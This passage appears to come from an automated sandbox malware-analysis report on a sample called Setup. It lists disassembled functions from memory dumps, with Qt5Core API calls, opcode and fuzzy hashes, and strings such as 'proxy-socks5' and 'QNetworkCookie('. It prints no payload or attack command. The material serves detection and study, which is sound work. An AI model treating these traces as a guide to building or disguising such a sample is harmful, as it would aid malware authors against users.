                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Array@@Byte$V0@@$?begin@$?detach@?dispose@?end@BasicData@1@Data@1@@Mutex@@Timer@@Url@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3810802383-0
                                                                                                                                                              • Opcode ID: f88c4e86a7a6addd8696299603cf2e32692ebed0d560fdb07d268aedcfe54d68
                                                                                                                                                              • Instruction ID: c700fa49b32a869fe6444df6e479d2e891379f5184560d0ba62175eedf6bbc26
                                                                                                                                                              • Opcode Fuzzy Hash: f88c4e86a7a6addd8696299603cf2e32692ebed0d560fdb07d268aedcfe54d68
                                                                                                                                                              • Instruction Fuzzy Hash: 9B418E72B0AA4286EB558F25E84417D7360FB85BA5B444132DF6E47B94EF3CE856CF00
                                                                                                                                                              Function 00007FFBA198A7D0 Relevance: 18.1, APIs: 12, Instructions: 109timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$ElapsedLongLong@Timer@@V0@@$?elapsed@?ready?restart@Device@@Null@Read@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 486414557-0
                                                                                                                                                              • Opcode ID: db79ca0deba5025a4a9234812b8810621c4d7ff65247698bdbadcc7f008856ce
                                                                                                                                                              • Instruction ID: e17f54c0457b17a6928ac5c178a1c71350cda4ba6bd3b40905f21f4f717c9dda
                                                                                                                                                              • Opcode Fuzzy Hash: db79ca0deba5025a4a9234812b8810621c4d7ff65247698bdbadcc7f008856ce
                                                                                                                                                              • Instruction Fuzzy Hash: 9D4174B2A1EA4281EF95CB35D4541B96361FF44BA8F488132DE5E076E8DF3CE446CB10
                                                                                                                                                              Function 00007FFBA197C430 Relevance: 18.1, APIs: 12, Instructions: 99timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@Array@@Byte$?data@Char@@Data@@Hash$?free?hasDateHash@@Node@Shrunk@Time@@memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3260407355-0
                                                                                                                                                              • Opcode ID: d80fd227786739f18c52c6fe6889b916e03d0b4eab8747d65d94ace93eb76240
                                                                                                                                                              • Instruction ID: bfbd5f1e722d91a551c73cccda13de29bdd4c1c60fe855cb8eb53fd7042205e8
                                                                                                                                                              • Opcode Fuzzy Hash: d80fd227786739f18c52c6fe6889b916e03d0b4eab8747d65d94ace93eb76240
                                                                                                                                                              • Instruction Fuzzy Hash: 05412BB6A09A4686DB91DB32E90406E77A1FF88FD8B844032DE5E47764EF3CD446CB10
                                                                                                                                                              Function 00007FFBA197C5A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197BE20: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA197BE58
                                                                                                                                                                • Part of subcall function 00007FFBA197BE20: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA197BE8B
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE ref: 00007FFBA197C5D8
                                                                                                                                                                • Part of subcall function 00007FFBA197CAF0: ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,00007FFBA197B899), ref: 00007FFBA197CB21
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197C609
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197C615
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197C628
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197C65A
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197C666
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197C679
                                                                                                                                                              • ?clear@QByteArray@@QEAAXXZ.QT5CORE ref: 00007FFBA197C687
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessCache::removeEntry: trying to remove key '%s' that is not in cache, xrefs: 00007FFBA197C61B
                                                                                                                                                              • QNetworkAccessCache::removeEntry: removing active cache entry '%s', xrefs: 00007FFBA197C66C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateLogger@@Message$Array@@ByteTime@@$?data@?warning@BasicChar@@Data@@HashHash@@String@@Timer@@$?clear@?current?detach_helper@?free_helper@?secs?start@?stop@Node@1@Node@1@@Object@@@TimeUtc@V1@@
                                                                                                                                                              • String ID: QNetworkAccessCache::removeEntry: removing active cache entry '%s'$QNetworkAccessCache::removeEntry: trying to remove key '%s' that is not in cache
                                                                                                                                                              • API String ID: 2986720860-2766300203
                                                                                                                                                              • Opcode ID: bd9a608a38b2827ebd807e598d12f6d6b4d5e0fab2ada34008ecb8b5120cf81a
                                                                                                                                                              • Instruction ID: 2ee638e3e6831b7a7c2fbf382b7d76c90b6be065da5cff544c854253e44adc81
                                                                                                                                                              • Opcode Fuzzy Hash: bd9a608a38b2827ebd807e598d12f6d6b4d5e0fab2ada34008ecb8b5120cf81a
                                                                                                                                                              • Instruction Fuzzy Hash: 54218DA6A0D65382EB95EB36E5541796362EF89FD8B844032DE0E07B55DE3CE006CF00
                                                                                                                                                              Function 00007FFBA19804C0 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 44COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QDebugStateSaver@@QEAA@AEAVQDebug@@@Z.QT5CORE ref: 00007FFBA19804DA
                                                                                                                                                              • ?resetFormat@QDebug@@QEAAAEAV1@XZ.QT5CORE ref: 00007FFBA19804E3
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA19804FB
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A2C
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A39
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A52
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@D@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A5E
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A6F
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982A92
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982AAC
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?isValid@QDateTime@@QEBA_NXZ.QT5CORE ref: 00007FFBA1982AB9
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982AD2
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QLocale@@QEAA@W4Language@0@W4Country@0@@Z.QT5CORE ref: 00007FFBA1982AE3
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1982B0C
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?toTimeSpec@QDateTime@@QEBA?AV1@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1982B23
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?toString@QLocale@@QEBA?AVQString@@AEBVQDateTime@@AEBV2@@Z.QT5CORE ref: 00007FFBA1982B39
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FFBA1982B46
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1982B53
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B5D
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B67
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B71
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B7B
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QLocale@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B85
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1982B92
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982BAB
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1982BBA
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQByteArray@@@Z.QT5CORE ref: 00007FFBA198051D
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@D@Z.QT5CORE ref: 00007FFBA1980528
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1980533
                                                                                                                                                              • ??0QDebug@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA198053F
                                                                                                                                                              • ??1QDebugStateSaver@@QEAA@XZ.QT5CORE ref: 00007FFBA198054A
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE ref: 00007FFBA1980553
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$String@@$Debug@@$DateTime@@V0@@$Locale@@$DebugEmpty@Latin1Saver@@Spec@StateTime$?resetA@$$Array@@@Char@@Char@@@Country@0@@Debug@@@Format@Language@0@Latin1@Qt@@@String@String@@@V2@@Valid@
                                                                                                                                                              • String ID: QNetworkCookie(
                                                                                                                                                              • API String ID: 4281602630-3944712187
                                                                                                                                                              • Opcode ID: 08be97c4103b21d52358a42ef796fbf677ed23c7f39ea229667e18de9d1fae62
                                                                                                                                                              • Instruction ID: 7b947ee31944d854cd7a4479365f2faaef7452c5b7cc3bb180d89c2698ef4203
                                                                                                                                                              • Opcode Fuzzy Hash: 08be97c4103b21d52358a42ef796fbf677ed23c7f39ea229667e18de9d1fae62
                                                                                                                                                              • Instruction Fuzzy Hash: A811616660EA5286EB42AB23F8541796361FB89FE1F444032DE5E07768EF3CD149CF00
                                                                                                                                                              Function 00007FFBA197EC50 Relevance: 16.6, APIs: 11, Instructions: 96COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@Byte$V0@@$?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1605803759-0
                                                                                                                                                              • Opcode ID: 9c394dad2745f26afad0d835458d3cf8a878f16f66659658877b95e1c8bab704
                                                                                                                                                              • Instruction ID: a86b8ff30d3aaf39cfd006f160a99c510b7ad6a57f4b2fdfe6c83d2efdd3aa59
                                                                                                                                                              • Opcode Fuzzy Hash: 9c394dad2745f26afad0d835458d3cf8a878f16f66659658877b95e1c8bab704
                                                                                                                                                              • Instruction Fuzzy Hash: BF3195A2B0AB4286DF619F25E9441B96762FF81BE6F494131CE5E0B764DF3CD44ACB00
                                                                                                                                                              Function 00007FFBA19E2450 Relevance: 16.6, APIs: 11, Instructions: 89COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$memmove$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1543662975-0
                                                                                                                                                              • Opcode ID: 378ee445609e1d19a50479974f7c0fce46371df3be2afe49f3b48be6e643e13a
                                                                                                                                                              • Instruction ID: 3f96fbac7e1ec74335293fffdd7d1de4ffe97bfafd2584a8cb9b628ea0913249
                                                                                                                                                              • Opcode Fuzzy Hash: 378ee445609e1d19a50479974f7c0fce46371df3be2afe49f3b48be6e643e13a
                                                                                                                                                              • Instruction Fuzzy Hash: 5A31BF72B0AA4282EF51CF25E5541B87369EB85BA1F184132DE1E477A4EF3CD486CF00
                                                                                                                                                              Function 00007FFBA19EC130 Relevance: 16.6, APIs: 11, Instructions: 60timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$DateTime@@V0@$$V0@@$?clear@?index?left@?mid@CaseLatin1Qt@@@Sensitivity@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2484421654-0
                                                                                                                                                              • Opcode ID: 2b71be30257cd61b2a9613fcff5fd81ee68421065e2b618b02493192e5927ca2
                                                                                                                                                              • Instruction ID: 7ec2d041b00261e782ed18fc65f91df603da432448ab6f8101df3b9d56a4751b
                                                                                                                                                              • Opcode Fuzzy Hash: 2b71be30257cd61b2a9613fcff5fd81ee68421065e2b618b02493192e5927ca2
                                                                                                                                                              • Instruction Fuzzy Hash: DB213C7660DA4286DB51CF24E444069B370FB88BA8F544232DEAE06AA8EF3CD549CF40
                                                                                                                                                              Function 00007FFBA1972A97 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 38COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1972ADA
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1972AE8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1972AF2
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ?setUserName@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B51
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B5B
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B7A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B84
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B99
                                                                                                                                                              • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BA9
                                                                                                                                                              • ?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BC8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BE2
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?set$Mode@1@@Parsing$Array@@ByteFormattingString@@@$?scheme@ComponentEmpty@Encoded@Flags@Fragment@Host@Latin1Name@Option@Option@2@@@@Port@Scheme@User
                                                                                                                                                              • String ID: proxy-socks5
                                                                                                                                                              • API String ID: 475963459-643255735
                                                                                                                                                              • Opcode ID: 02037a369cbef131aaed94efa849bd51d112a4d45360b026dfddde4a332cc209
                                                                                                                                                              • Instruction ID: 7cc12cd24ec6265e156b5d92e1df46d5b8d7302173aa52b260eda3734f0ab757
                                                                                                                                                              • Opcode Fuzzy Hash: 02037a369cbef131aaed94efa849bd51d112a4d45360b026dfddde4a332cc209
                                                                                                                                                              • Instruction Fuzzy Hash: C611FB62A19A1699EF82CF74D8400FC23B1FF54759B844032DE5E16968EF3CE18ACB50
                                                                                                                                                              Function 00007FFBA1972AA7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 38COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1972ADA
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1972AE8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1972AF2
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ?setUserName@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B51
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B5B
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B7A
